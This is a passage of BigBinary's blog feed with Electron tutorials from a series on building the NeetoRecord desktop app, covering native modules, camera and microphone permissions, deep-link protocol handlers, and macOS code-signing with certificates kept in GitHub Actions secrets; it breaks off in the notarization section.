100 filesignings, reducing the cost to $3 per signing. For more information, visit:https://www.ssl.com/guide/esigner-pricing-for-code-signing/</p><p><img src="/blog_images/2024/ev-code-sign-windows-application-ssl-com/esigner_pricing.png" alt="esigner pricing"></p>]]></content>
    </entry><entry>
       <title><![CDATA[Using native modules in Electron]]></title>
       <author><name>Farhan CK</name></author>
      <link href="https://www.bigbinary.com/blog/native-modules-electron"/>
      <updated>2024-12-11T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/native-modules-electron</id>
      <content type="html"><![CDATA[<p><em>Recently, we built <a href="https://neetorecord.com/neetorecord/">NeetoRecord</a>, a loomalternative. The desktop application was built using Electron. In a series ofblogs, we capture how we built the desktop application and the challenges we raninto. This blog is part 8 of the blog series. You can also read about<a href="https://www.bigbinary.com/blog/sync-store-main-renderer-electron">part 1</a>,<a href="https://www.bigbinary.com/blog/publish-electron-application">part 2</a>,<a href="https://www.bigbinary.com/blog/video-background-removal">part 3</a>,<a href="https://www.bigbinary.com/blog/electron-multiple-browser-windows">part 4</a>,<a href="https://www.bigbinary.com/blog/code-sign-notorize-mac-desktop-app">part 5</a>,<a href="https://www.bigbinary.com/blog/deep-link-electron-app">part 6</a>,<a href="https://www.bigbinary.com/blog/request-camera-micophone-permission-electron">part 7</a>and<a href="https://www.bigbinary.com/blog/ev-code-sign-windows-application-ssl-com">part 9</a>.</em></p><p>Native modules allow developers to access low-level APIs like hardwareinteraction, native GUI components, or other system-specific features. BecauseElectron applications run across different platforms (Windows, macOS, Linux),native modules must be compiled for each target platform. This can introducechallenges in cross-platform development.</p><p>To simplify this process, Electron provides tools like<a href="https://github.com/electron/rebuild">electron-rebuild</a> to automate therecompilation of native modules against Electron's custom Node.js environment,ensuring compatibility and stability in the Electron application.</p><h3>How to use electron-rebuild</h3><p><code>electron-rebuild</code> can automatically determine the version of Electron andhandle the manual steps of downloading headers and rebuilding native modules forour app.</p><p>To do a manual rebuild, run the below command.</p><pre><code class="language-bash">./node_modules/.bin/electron-rebuild// If we are on windows.\node_modules\.bin\electron-rebuild.cmd</code></pre><p>This process should be run after each native package is installed. We can addthis command to the <code>postinstall</code> script to automate it.</p><pre><code class="language-json">&quot;scripts&quot;: {    &quot;postinstall&quot;: &quot;./node_modules/.bin/electron-rebuild&quot;    //...others}</code></pre><p>Since Electron uses Chromium browser windows as the user interface, we need toexclude any native modules from being bundled in the renderer process, whichruns inside the browser window. To achieve this, we need to separate frontendmodules from native modules and install them in separate <code>node_modules</code> folders.</p><h3>Two package.json structure</h3><p>To tackle this problem, Electron developers started using two <code>package.json</code>structure, where the first one, which sits at the root of the project, includesthe <code>dependencies</code> that are needed for the user interface and all the<code>devDependencies</code> that are needed to develop, build, and package theapplication.</p><pre><code class="language-json">// root package.json{  &quot;name&quot;: &quot;my-app&quot;,  &quot;version&quot;: &quot;1.0.0&quot;,  &quot;description&quot;: &quot;A sample application&quot;,  &quot;license&quot;: &quot;Apache-2.0&quot;,  &quot;main&quot;: &quot;./src/main/main.mjs&quot;,  &quot;dependencies&quot;: {    &quot;react&quot;: &quot;^18.2.0&quot;,    &quot;react-router-dom&quot;: &quot;5.3.3&quot;  },  &quot;devDependencies&quot;: {    &quot;electron&quot;: &quot;^31.2.1&quot;,    &quot;electron-builder&quot;: &quot;^25.0.1&quot;  }}</code></pre><p>And a second <code>package.json</code> file, located at <code>./app/package.json</code>, includes allthe native dependencies that should only run in a Node.js environment. The<code>electron-rebuild postinstall</code> script we discussed should be added to the<code>./app/package.json</code>.</p><pre><code class="language-json">// ./app/package.json{  &quot;name&quot;: &quot;my-app&quot;,  &quot;version&quot;: &quot;1.0.0&quot;,  &quot;description&quot;: &quot;A sample application&quot;,  &quot;license&quot;: &quot;Apache-2.0&quot;,  &quot;main&quot;: &quot;./dist/main/main.js&quot;,  &quot;scripts&quot;: {    &quot;postinstall&quot;: &quot;./node_modules/.bin/electron-rebuild&quot;  },  &quot;dependencies&quot;: {    &quot;sqlite3&quot;: &quot;^5.1.7&quot;,    &quot;sharp&quot;: &quot;^0.33.5&quot;  }}</code></pre><p>We can add a <code>postinstall</code> script in the root to automatically install the<code>dependencies</code> listed in <code>./app/package.json</code> when installing the root<code>package.json</code>.</p><pre><code class="language-json">// root package.json{  &quot;name&quot;: &quot;my-app&quot;,  &quot;version&quot;: &quot;1.0.0&quot;,  &quot;description&quot;: &quot;A sample application&quot;,  &quot;license&quot;: &quot;Apache-2.0&quot;,  &quot;main&quot;: &quot;./src/main/main.mjs&quot;,  &quot;dependencies&quot;: {    &quot;react&quot;: &quot;^18.2.0&quot;,    &quot;react-router-dom&quot;: &quot;5.3.3&quot;,  }  &quot;devDependencies&quot;: {    &quot;electron&quot;: &quot;^31.2.1&quot;,    &quot;electron-builder&quot;: &quot;^25.0.1&quot;,  },  &quot;scripts&quot;: {    &quot;postinstall&quot;: &quot;yarn --cwd ./app install&quot;  }}</code></pre><p>Now, if we run the <code>yarn install</code> from the root, after installing rootdependencies, it will install native dependencies in the <code>app/</code> folder and thenrebuild the native packages. All in one command.</p><p>When building, we should output the frontend bundles to the <code>app/dist</code> folder.This way, when packaging, both our native packages and other dependencies willbe contained within the app folder. Read<a href="https://www.bigbinary.com/blog/publish-electron-application">this blog</a> tolearn more about how to build and publish an Electron application.</p><pre><code class="language-javascript">electron-app assets app    node_modules    dist    package.json src node_modules package.json</code></pre><p>This approach works well while packaging the app, but during development, howcan we access the native modules? To solve this, we need to create a symlinkfrom <code>app/node_modules</code> to <code>src/main/node_modules</code>. We can create a script tohandle this.</p><pre><code class="language-js">// ./scripts/link-modules.mjsimport fs from &quot;fs&quot;;fs.symlinkSync(&quot;./app/node_modules&quot;, &quot;./src/main/node_modules&quot;, &quot;junction&quot;);</code></pre><p>We can run this script in <code>postinstall</code> as well:</p><pre><code class="language-json">// ./app/package.json{  &quot;name&quot;: &quot;my-app&quot;,  &quot;version&quot;: &quot;1.0.0&quot;,  &quot;description&quot;: &quot;A sample application&quot;,  &quot;license&quot;: &quot;Apache-2.0&quot;,  &quot;main&quot;: &quot;./dist/main/main.js&quot;,  &quot;scripts&quot;: {    &quot;link-modules&quot;: &quot;node ../scripts/link-modules.mjs&quot;,    &quot;postinstall&quot;: &quot;./node_modules/.bin/electron-rebuild &amp;&amp; yarn link-modules&quot;  },  &quot;dependencies&quot;: {    &quot;sqlite3&quot;: &quot;^5.1.7&quot;,    &quot;sharp&quot;: &quot;^0.33.5&quot;  }}</code></pre><h3>Problem with two package.json structure</h3><p>In most JavaScript projects, metadata such as <code>version</code>, <code>name</code>, and<code>description</code> is typically stored in the root <code>package.json</code>. However, in thiscase, when packaging the app, we'll be including <code>./app/package.json</code> instead ofthe root <code>package.json</code>. This means all metadata should be in<code>./app/package.json</code> rather than in the root file.</p><p>This approach poses a challenge, particularly with tasks like automatic versionbumping. When updating the version or other metadata, changes need to be made intwo places, which can lead to inconsistencies.</p><p>To simplify this process and avoid maintaining two separate <code>package.json</code>files, we can dynamically create <code>./app/package.json</code>, allowing us to manageeverything in one place. Since we cannot add native dependencies directly to theroot <code>dependencies</code>, we can introduce a new field called <code>nativeDependencies</code>.When dynamically generating <code>./app/package.json</code>, we can copy the<code>nativeDependencies</code> into the <code>dependencies</code> field of <code>./app/package.json</code>.</p><p>This can be accomplished by creating a script to automate the process:</p><pre><code class="language-js">// ./script/create-native-package-json.jsimport fse from &quot;fs-extra&quot;;const packageJson = JSON.parse(fse.readFileSync(&quot;./package.json&quot;, &quot;utf8&quot;));const APP_DIR = &quot;./app/&quot;;const releaseJson = {  name: packageJson.name,  version: packageJson.version,  description: packageJson.description,  license: packageJson.license,  author: packageJson.author,  main: &quot;./dist/main/main.js&quot;,  scripts: {    postinstall: &quot;/node_modules/.bin/electron-rebuild &amp;&amp; yarn link-modules&quot;,    &quot;link-modules&quot;: &quot;node ../scripts/link-modules.mjs&quot;,  },  dependencies: packageJson.nativeDependencies,};fse.mkdirSync(APP_DIR, { recursive: true });fse.writeFileSync(  APP_DIR + &quot;package.json&quot;,  JSON.stringify(releaseJson, null, 2));</code></pre><p>In the script, we first fetch the root <code>package.json</code>, create a JSON file, andcopy all the metadata. We then update the <code>main</code> field to point to the compiledversion of <code>main.js</code>, copy <code>nativeDependencies</code> into the <code>dependencies</code>, and addthe <code>postinstall</code> script for electron-rebuild and node_modules linking wediscussed earlier.</p><p>We can run this script in the root <code>postinstall</code>, so that if we make any changesto <code>package.json</code>, it will be updated in <code>./app/package.json</code> during<code>yarn install</code>.</p><pre><code class="language-json">// root package.json&quot;scripts&quot;: {    &quot;nativeInstall&quot;: &quot;yarn --cwd ./app install&quot;,    &quot;postinstall&quot;: &quot;node ./script/create-native-package-json.js &amp;&amp; yarn nativeInstall&quot;,    //...others}</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Requesting camera and microphone permission in an Electron app]]></title>
       <author><name>Farhan CK</name></author>
      <link href="https://www.bigbinary.com/blog/request-camera-micophone-permission-electron"/>
      <updated>2024-12-03T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/request-camera-micophone-permission-electron</id>
      <content type="html"><![CDATA[<p><em>Recently, we built <a href="https://neetorecord.com/neetorecord/">NeetoRecord</a>, a loomalternative. The desktop application was built using Electron. In a series ofblogs, we capture how we built the desktop application and the challenges we raninto. This blog is part 7 of the blog series. You can also read about<a href="https://www.bigbinary.com/blog/sync-store-main-renderer-electron">part 1</a>,<a href="https://www.bigbinary.com/blog/publish-electron-application">part 2</a>,<a href="https://www.bigbinary.com/blog/video-background-removal">part 3</a>,<a href="https://www.bigbinary.com/blog/electron-multiple-browser-windows">part 4</a>,<a href="https://www.bigbinary.com/blog/code-sign-notorize-mac-desktop-app">part 5</a>,<a href="https://www.bigbinary.com/blog/deep-link-electron-app">part 6</a><a href="https://www.bigbinary.com/blog/native-modules-electron">part 8</a> and<a href="https://www.bigbinary.com/blog/ev-code-sign-windows-application-ssl-com">part 9</a>.</em></p><p>When developing an Electron app, handling permissions for the camera andmicrophone varies from platform to platform. On macOS, apps are denied access tothe camera and microphone by default. To gain access, we must explicitly requestthese permissions from the user. On the other hand, Windows tends to grant thesepermissions to apps by default, although users can manually revoke them throughthe system settings.</p><h3>Updating entitlement file for Mac</h3><p>In macOS, applications are run with a limited set of permissions to limitpotential damage from malicious code. Depending on which Electron APIs our appuses, we may need to add additional entitlements to our app's entitlements file.</p><p>In macOS applications, entitlements or permissions are specified using a filewith a format like property list (<code>.plist</code>) or XML.</p><pre><code class="language-xml">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;&lt;!DOCTYPE plist PUBLIC &quot;-//Apple//DTD PLIST 1.0//EN&quot; &quot;http://www.apple.com/DTDs/PropertyList-1.0.dtd&quot;&gt;&lt;plist version=&quot;1.0&quot;&gt;  &lt;dict&gt;    &lt;key&gt;com.apple.security.cs.allow-unsigned-executable-memory&lt;/key&gt;    &lt;true/&gt;    &lt;key&gt;com.apple.security.cs.allow-jit&lt;/key&gt;    &lt;true/&gt;    &lt;key&gt;com.apple.security.device.camera&lt;/key&gt;    &lt;true/&gt;    &lt;key&gt;com.apple.security.device.microphone&lt;/key&gt;    &lt;true/&gt;    &lt;key&gt;com.apple.security.device.audio-input&lt;/key&gt;    &lt;true/&gt;    &lt;key&gt;com.apple.security.cs.allow-dyld-environment-variables&lt;/key&gt;    &lt;true/&gt;  &lt;/dict&gt;&lt;/plist&gt;</code></pre><p>For our purpose, we need <code>com.apple.security.device.camera</code> for the camera and<code>com.apple.security.device.microphone</code> and<code>com.apple.security.device.audio-input</code> entitlements for the microphone.</p><h3>Configuring in electron-builder</h3><p><a href="https://www.electron.build/">electron-builder</a> is a popular alternative packagefor building, packaging and distributing Electron applications.</p><p>We need to ensure that the path to <code>entitlements.plist</code> is correctly set in the<code>electron-builder</code> configuration.</p><pre><code class="language-json"> &quot;build&quot;: {    &quot;productName&quot;: &quot;AppName&quot;,    &quot;appId&quot;: &quot;com.neeto.AppName&quot;,     &quot;mac&quot;: {      &quot;target&quot;: {        &quot;target&quot;: &quot;default&quot;,        &quot;arch&quot;: [          &quot;arm64&quot;,          &quot;x64&quot;        ]      },      &quot;type&quot;: &quot;distribution&quot;,      &quot;entitlements&quot;: &quot;assets/entitlements.mac.plist&quot;,    }, }</code></pre><p>We also need to provide a description of the camera and microphone's usage inthe <code>Info.plist</code>. We don't have to create an <code>Info.plist</code> when using<code>electron-builder</code>; it will create and handle it internally, and any additionalinfo can be passed using the <code>extendInfo</code> key.</p><pre><code class="language-json"> &quot;build&quot;: {    &quot;productName&quot;: &quot;AppName&quot;,    &quot;appId&quot;: &quot;com.neeto.AppName&quot;,     &quot;mac&quot;: {      &quot;target&quot;: {        &quot;target&quot;: &quot;default&quot;,        &quot;arch&quot;: [          &quot;arm64&quot;,          &quot;x64&quot;        ]      },      &quot;type&quot;: &quot;distribution&quot;,      &quot;entitlements&quot;: &quot;assets/entitlements.mac.plist&quot;,      &quot;entitlementsInherit&quot;: &quot;assets/entitlements.mac.plist&quot;,      &quot;extendInfo&quot;: {        &quot;NSMicrophoneUsageDescription&quot;: &quot;Please give us access to your microphone&quot;,        &quot;NSCameraUsageDescription&quot;: &quot;Please give us access to your camera&quot;,      },    }, }</code></pre><p>The above code will add <code>NSMicrophoneUsageDescription</code> and<code>NSCameraUsageDescription</code> to the <code>Info.plist</code>.</p><h3>Requesting permission</h3><p>Electron's<a href="https://www.electronjs.org/docs/latest/api/system-preferences">systemPreferences</a>module exposes events and methods to access and alter system preferences.</p><p>Before requesting permission, we can use the<code>systemPreferences.getMediaAccessStatus</code> method to check if we already have theaccess.</p><pre><code class="language-js">import { systemPreferences } from &quot;electron&quot;;const hasMicrophonePermission =  systemPreferences.getMediaAccessStatus(&quot;microphone&quot;) === &quot;granted&quot;;const hasCameraPermission =  systemPreferences.getMediaAccessStatus(&quot;camera&quot;) === &quot;granted&quot;;</code></pre><p>For the camera and microphone, if permission is granted, it will return<code>granted</code>; otherwise, depending on the platform and permission settings, it willreturn <code>not-determined</code>, <code>denied</code>, <code>restricted</code> or <code>unknown</code>.</p><p><strong>For Mac</strong>, we can use the <code>systemPreferences.askForMediaAccess</code> method torequest permission. This method will return a promise that resolves with <code>true</code>if consent was granted and <code>false</code> if it was denied.</p><pre><code class="language-js">const cameraGranted = await systemPreferences.askForMediaAccess(&quot;camera&quot;);const microPhoneGranted = await systemPreferences.askForMediaAccess(  &quot;microphone&quot;);</code></pre><p>When we call this method, it will open a system alert asking the user to grantpermission.</p><p><img src="/blog_images/2024/request-camera-micophone-permission-electron/camera-permission-alert.png" alt="camera permission"></p><p>If the user denies the permission the very first time, this method call will notopen the system alert again. Now, we have to open the system preference pane andask the user to enable it from there.</p><pre><code class="language-js">import { shell } from &quot;electron&quot;;const cameraGranted = await systemPreferences.askForMediaAccess(&quot;camera&quot;);if (!cameraGranted) {  shell.openExternal(    &quot;x-apple.systempreferences:com.apple.preference.security?Privacy_Camera&quot;  );}const microPhoneGranted = await systemPreferences.askForMediaAccess(  &quot;microphone&quot;);if (!microPhoneGranted) {  shell.openExternal(    &quot;x-apple.systempreferences:com.apple.preference.security?Privacy_Microphone&quot;  );}</code></pre><p>To open the preference pane, we can use the<a href="https://www.electronjs.org/docs/latest/api/shell">shell</a> module.<code>shell.openExternal</code> can be used to call any external protocol URL.</p><p>Here we are opening <code>System preference(x-apple.systempreferences)</code> -&gt;<code>Privacy &amp; Security(com.apple.preference.security)</code> -&gt; <code>Camera(Privacy_Camera)</code>or <code>Microphone(Privacy_Microphone)</code>.</p><p><img src="/blog_images/2024/request-camera-micophone-permission-electron/camera-settings-mac.png" alt="camera permission"></p><p>Since we asked the user to open the preference pane because the user initiallydenied permission if they chose to enable it this time, we should ask them torelaunch the application. Only then will the updated permission settings takeeffect.</p><p><strong>Windows</strong> has global settings for controlling the camera and microphone. Thegood thing is that it is enabled by default. But in case the user explicitlydisables it, one thing we can do is open the privacy settings page of the cameraand microphone and ask the user to re-enable it.</p><pre><code class="language-js">const hasMicrophonePermission =  systemPreferences.getMediaAccessStatus(&quot;microphone&quot;) === &quot;granted&quot;;if (!hasMicrophonePermission) {  shell.openExternal(&quot;ms-settings:privacy-microphone&quot;);}const hasCameraPermission =  systemPreferences.getMediaAccessStatus(&quot;camera&quot;) === &quot;granted&quot;;if (!hasCameraPermission) {  shell.openExternal(&quot;ms-settings:privacy-webcam&quot;);}</code></pre><p><img src="/blog_images/2024/request-camera-micophone-permission-electron/windows-camera.png" alt="windows camera permission"></p><p>Just like we did for Mac, we use the <code>shell.openExternal</code> method to open the<code>Setting(ms-settings)</code> -&gt; <code>Privacy</code> -&gt; <code>Camera(privacy-webcam)</code> or<code>Microphone(privacy-microphone)</code>.</p><p>And we are done! Here is everything put together.</p><pre><code class="language-js">const checkMicrophonePermission = async () =&gt; {  const hasMicrophonePermission =    systemPreferences.getMediaAccessStatus(&quot;microphone&quot;) === &quot;granted&quot;;  if (hasMicrophonePermission) return;  if (process.platform === &quot;darwin&quot;) {    const microPhoneGranted = await systemPreferences.askForMediaAccess(      &quot;microphone&quot;    );    if (!microPhoneGranted) {      shell.openExternal(        &quot;x-apple.systempreferences:com.apple.preference.security?Privacy_Microphone&quot;      );    }  } else if (process.platform === &quot;win32&quot;) {    shell.openExternal(&quot;ms-settings:privacy-microphone&quot;);  }};const checkCameraPermission = async () =&gt; {  const hasCameraPermission =    systemPreferences.getMediaAccessStatus(&quot;camera&quot;) === &quot;granted&quot;;  if (hasCameraPermission) return;  if (process.platform === &quot;darwin&quot;) {    const cameraGranted = await systemPreferences.askForMediaAccess(&quot;camera&quot;);    if (!cameraGranted) {      shell.openExternal(        &quot;x-apple.systempreferences:com.apple.preference.security?Privacy_Camera&quot;      );    }  } else if (process.platform === &quot;win32&quot;) {    shell.openExternal(&quot;ms-settings:privacy-webcam&quot;);  }};</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Building deep-links in Electron application]]></title>
       <author><name>Farhan CK</name></author>
      <link href="https://www.bigbinary.com/blog/deep-link-electron-app"/>
      <updated>2024-11-26T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/deep-link-electron-app</id>
      <content type="html"><![CDATA[<p><em>Recently, we built <a href="https://neetorecord.com/neetorecord/">NeetoRecord</a>, a loomalternative. The desktop application was built using Electron. In a series ofblogs, we capture how we built the desktop application and the challenges we raninto. This blog is part 6 of the blog series. You can also read about<a href="https://www.bigbinary.com/blog/sync-store-main-renderer-electron">part 1</a>,<a href="https://www.bigbinary.com/blog/publish-electron-application">part 2</a>,<a href="https://www.bigbinary.com/blog/video-background-removal">part 3</a>,<a href="https://www.bigbinary.com/blog/electron-multiple-browser-windows">part 4</a>,<a href="https://www.bigbinary.com/blog/code-sign-notorize-mac-desktop-app">part 5</a>,<a href="https://www.bigbinary.com/blog/request-camera-micophone-permission-electron">part 7</a><a href="https://www.bigbinary.com/blog/native-modules-electron">part 8</a> and<a href="https://www.bigbinary.com/blog/ev-code-sign-windows-application-ssl-com">part 9</a>.</em></p><p>When developing a desktop application, including every feature directly withinthe app is often unnecessary. Instead, we can offload some tasks such aslogin/signup to a web application. And from the web app, create deep-links tothe desktop app. We can also create shareable links that opens specific contenton the app.</p><p>In this blog, we are going to discuss how to create deep-links in our<a href="https://electronjs.org/">Electron</a> application.</p><h2>Register a custom protocol</h2><p>A protocol is a custom URL scheme that an application can handle, similar to howbrowsers handle protocols like <code>http</code>, <code>https</code>, <code>mailto</code>, or <code>ftp</code>. Everyoperating system supports the handling of custom protocols. We can register anapplication as a default handler for a custom protocol with the operatingsystem. Electron provides a simple API to register a default protocol client.</p><pre><code class="language-js">if (process.defaultApp) {  if (process.argv.length &gt;= 2) {    app.setAsDefaultProtocolClient(&quot;my-app&quot;, process.execPath, [      path.resolve(process.argv[1]),    ]);  }} else {  app.setAsDefaultProtocolClient(&quot;my-app&quot;);}</code></pre><p>The code snippet above is a simple example of registering a default protocolclient. In the example, we registered a custom protocol named <code>my-app</code> with theoperating system. It's important to note that the application must be properlypackaged and installed so that the operating system can correctly handle andlaunch the registered app.</p><p>We used <code>process.defaultApp</code> instead of <code>app.isPackaged</code> because Electron allowsus to run a packaged app using the <code>electron .</code> command. In such cases, we needto provide the execution path for the system to recognize the app. However, ifthe app is running in normal mode, simply calling<code>app.setAsDefaultProtocolClient</code> is sufficient.</p><h2>Handling custom protocol</h2><p>Though registering the protocol is simple and the same for every platform, thereare some differences when it comes to handling it.</p><p><strong>For macOS</strong>, we need to listen to the <code>open-url</code> event.</p><pre><code class="language-js">const handleCustomUrl = url =&gt; {  // Handle url};app.on(&quot;open-url&quot;, (event, url) =&gt; {  handleCustomUrl(url);});</code></pre><p><strong>On both Windows and Linux</strong>, if the application is up and running, a<code>second-instance</code> event is emitted instead of <code>open-url</code> when a protocol requestis received. This means a new instance of our app will be created. If we want toavoid this behavior and notify the existing instance instead, we'll need toensure the app runs as a single instance. We can achieve this by using<code>requestSingleInstanceLock</code>.</p><pre><code class="language-js">const gotTheLock = app.requestSingleInstanceLock();if (!gotTheLock) {  app.quit();}</code></pre><p>The above code ensures that our Windows or Linux app runs as a single instance.If a user attempts to open a new instance, that instance will try to acquire thesingle instance lock. If it fails, the newly created instance will simply quit.</p><pre><code class="language-js">const gotTheLock = app.requestSingleInstanceLock();if (!gotTheLock) {  app.quit();} else {  app.on(&quot;second-instance&quot;, (event, commands, workingDir) =&gt; {    handleCustomUrl(commands.pop());  });}</code></pre><p>If we successfully acquire the single instance lock, it means we're running thefirst instance of the app. When a user attempts to open another instance,Electron emits a <code>second-instance</code> event to the existing instance. The secondargument of this event contains an array of command-line arguments, and we canretrieve the custom URL from the last item in this array.</p><p>We've addressed the case where the app is already running, but what happens ifthe app is completely closed and a protocol request is made? On <strong>macOS</strong>,there's nothing extra to do; the app will launch, and the <code>open-url</code> event willbe triggered automatically.</p><p>However, for <strong>Windows and Linux</strong>, the behavior is different. The<code>second-instance</code> event won't be triggered since the app is starting for thefirst time. Instead, we can retrieve the custom URL from <code>process.argv</code>, as theapp will start with the protocol URL passed as one of its parameters. To handlethis case, we need to check <code>process.argv</code> when the app is started.</p><pre><code class="language-js">const handleCustomUrl = url =&gt; {  // Handle url};app.whenReady().then(() =&gt; {  const customUrl = process.argv.find(item =&gt; item.startsWith(&quot;my-app://&quot;));  if (customUrl) {    handleCustomUrl(customUrl);  }});</code></pre><p>Here, when the app is ready, we look for an item in <code>process.argv</code> that startswith our URL scheme (<code>my-app://</code>), if yes we can confirm that this instance isstarted when a protocol request is received.</p><p>Great! Here's the complete solution that works across all platforms, whether theapp is already running or not.</p><pre><code class="language-js">if (process.defaultApp) {  if (process.argv.length &gt;= 2) {    app.setAsDefaultProtocolClient(&quot;my-app&quot;, process.execPath, [      path.resolve(process.argv[1]),    ]);  }} else {  app.setAsDefaultProtocolClient(&quot;my-app&quot;);}const handleCustomUrl = url =&gt; {  // Handle url};app.on(&quot;open-url&quot;, (event, url) =&gt; {  handleCustomUrl(url);});const gotTheLock = app.requestSingleInstanceLock();if (!gotTheLock) {  app.quit();} else {  app.on(&quot;second-instance&quot;, (event, commands, workingDir) =&gt; {    handleCustomUrl(commands.pop());  });}app.whenReady().then(() =&gt; {  const customUrl = process.argv.find(item =&gt; item.startsWith(&quot;my-app://&quot;));  if (customUrl) {    handleCustomUrl(customUrl);  }});</code></pre><h2>Packaging</h2><p>On macOS and Linux, this feature is only functional when our app is packaged; itwon't work during development when launching from the command line. To ensureproper functionality, we must update the macOS <code>Info.plist</code> file and the Linux<code>.desktop</code> file to include the new protocol handler when packaging our app. Thisallows the operating system to recognize and handle the custom URLs correctly.</p><p><code>electron-builder</code> handles this internally when packaging the app; We just needto configure the <code>electron-builder</code> accordingly. To learn more about how topackage our app using <code>electron-builder</code>, check out<a href="https://www.bigbinary.com/blog/publish-electron-application">this blog</a>.</p><pre><code class="language-json">&quot;build&quot;: {    &quot;productName&quot;: &quot;NeetoRecord&quot;,    &quot;appId&quot;: &quot;com.neeto.neetoRecord&quot;,    &quot;protocols&quot;: {      &quot;name&quot;: &quot;my-app-protocol&quot;,      &quot;schemes&quot;: [        &quot;my-app&quot;      ]    },    &quot;win&quot;: {...},    &quot;linux&quot;: {...},    &quot;mac&quot;: {...}}</code></pre><p>We can use the <code>protocols</code> field for that, give a name, then pass an array ofURL schemes the app supports, and the rest <code>electron-builder</code> will handle it.</p>]]></content>
    </entry><entry>
       <title><![CDATA[How to code-sign and notarize an Electron application for macOS]]></title>
       <author><name>Farhan CK</name></author>
      <link href="https://www.bigbinary.com/blog/code-sign-notorize-mac-desktop-app"/>
      <updated>2024-11-19T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/code-sign-notorize-mac-desktop-app</id>
      <content type="html"><![CDATA[<p><em>Recently, we built <a href="https://neetorecord.com/neetorecord/">NeetoRecord</a>, a loomalternative. The desktop application was built using Electron. In a series ofblogs, we capture how we built the desktop application and the challenges we raninto. This blog is part 5 of the blog series. You can also read about<a href="https://www.bigbinary.com/blog/sync-store-main-renderer-electron">part 1</a>,<a href="https://www.bigbinary.com/blog/publish-electron-application">part 2</a>,<a href="https://www.bigbinary.com/blog/video-background-removal">part 3</a>,<a href="https://www.bigbinary.com/blog/electron-multiple-browser-windows">part 4</a>,<a href="https://www.bigbinary.com/blog/deep-link-electron-app">part 6</a>,<a href="https://www.bigbinary.com/blog/request-camera-micophone-permission-electron">part 7</a><a href="https://www.bigbinary.com/blog/native-modules-electron">part 8</a> and<a href="https://www.bigbinary.com/blog/ev-code-sign-windows-application-ssl-com">part 9</a>.</em></p><p>macOS identifies applications that are not code-signed and notarized as beingfrom unknown publishers and blocks their installation. Code-signing allows macOSto recognize the application's creator. Notarization, an additional step,provides extra credibility and security, ensuring a safer experience for users.</p><h3>What is code-signing?</h3><p>Code-signing is the process of generating a unique digital fingerprint of thecode using a cryptographic hash function. This fingerprint is combined with acertificate from a trusted Certificate Authority (CA) to create the digitalsignature. When users download or execute the software, the operating systemverifies this signature to confirm its authenticity.</p><p>Apple prefers developers to use certificates issued through the Apple DeveloperProgram to sign macOS applications. This is because macOS verifies signaturesagainst Apple's own Certificate Authority. If a third-party certificate is used,macOS might not recognize it as trusted, leading to warnings or blocking theapplication from running due to<a href="https://support.apple.com/en-in/guide/security/sec5599b66df/web">Gatekeeper</a>,Apple's security feature.</p><h3>Enroll in the Apple developer program</h3><p>We should enroll in the Apple developer program (which costs $99 per year) tocreate a certificate that we can use to code-sign our application. We can follow<a href="https://developer.apple.com/programs/enroll/">this link</a> to know what we needto enroll in the Apple developer program.</p><h3>Apple certificates</h3><p>Apple provides two main types of code-signing certificates:</p><ul><li><strong>Developer ID Certificate:</strong> Used to sign apps distributed outside the MacApp Store. Apps signed with this can be gatekeeper-approved.</li><li><strong>Mac App Distribution Certificate:</strong> Required for submitting apps to the MacApp Store. Apple will re-sign the application after review and approval fordistribution on the Mac App Store.</li></ul><p>In this blog, we will look into how to code-sign an<a href="https://electronjs.org/">Electron</a> application using <strong>Developer IDCertificate</strong>.</p><h3>Create a Developer ID certificate</h3><p>To create a Developer ID certificate, we can follow Apple's detailed guide on<a href="https://developer.apple.com/help/account/create-certificates/create-developer-id-certificates/">how to create a Developer ID certificate</a>.</p><p>Once we've successfully created the certificate and downloaded the <code>.cer</code> file,the next step is to convert this file into a <code>.p12</code> format.</p><p>First, we'll need to convert the <code>.cer</code> file into a <code>.pem</code> format. We can dothis using <code>openssl</code>.</p><pre><code class="language-bash">openssl x509 -in certificate.cer -inform DER -out certificate.pem -outform PEM</code></pre><p>Then, use the <code>.pem</code> file and our private <code>.key</code> to generate the <code>.p12</code> file.</p><pre><code class="language-bash">openssl pkcs12 -export -out certificate.p12 -inkey certificate-private.key -in certificate.pem</code></pre><p>When generating the <code>.p12</code> file, we'll be prompted to set a password. Save thispassword in a secure location, as we'll need it later when code-signing theapplication.</p><p>To use this certificate with our existing GitHub Action workflow to automate thedeployment process, we need to convert this <code>.p12</code> file into a base64 string.This is necessary because GitHub doesn't allow uploading files as secrets, butwe can store the base64 string instead.</p><pre><code class="language-bash">openssl base64 -in certificate.p12 -out certificate.txt</code></pre><p>The command will output the base64 version of the <code>.p12</code> file into a<code>certificate.txt</code> file. We can then add the text contents of this file as asecret in GitHub. Save the base64 string in GitHub secrets with the name<code>CSC_CONTENT</code> and password as <code>CSC_KEY_PASSWORD</code></p><h3>Update Electron build process</h3><p>To code-sign a macOS app, we just need to pass the certificate and password tothe <a href="https://www.electron.build/">electron-builder</a> <code>publish</code> command. However,since we saved our certificate as a base64 string, we need to convert it back toa <code>.p12</code> file before publishing.</p><pre><code class="language-yml"> - name: Publish releases    env:      GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}      AWS_ACCESS_KEY_ID: ${{secrets.AWS_ACCESS_KEY}}      AWS_SECRET_ACCESS_KEY: ${{secrets.AWS_SECRET}}      CSC_CONTENT: ${{ secrets.CSC_CONTENT }}      CSC_KEY_PASSWORD: ${{ secrets.CSC_KEY_PASSWORD }}    run: |      echo &quot;$CSC_CONTENT&quot; | base64 --decode &gt; certificate.p12      export CSC_LINK=&quot;./certificate.p12&quot;      npm exec electron-builder -- --publish always -mwl</code></pre><p>As mentioned above, we first decoded the base64 string back to a<code>certificate.p12</code> file. We then set the path to this file as <code>CSC_LINK,</code> which<code>electron-builder</code> expects.</p><p>Great! With everything in place, running this workflow should successfullycode-sign our application.</p><h2>Notarize</h2><p>Code-signing allows macOS to recognize the application's creator, but this aloneis insufficient. Users will still see a warning stating, <strong>&quot;macOS cannot verifyif the app is free from malware.&quot;</strong></p><p>To eliminate this warning, we need to notarize our application.<a 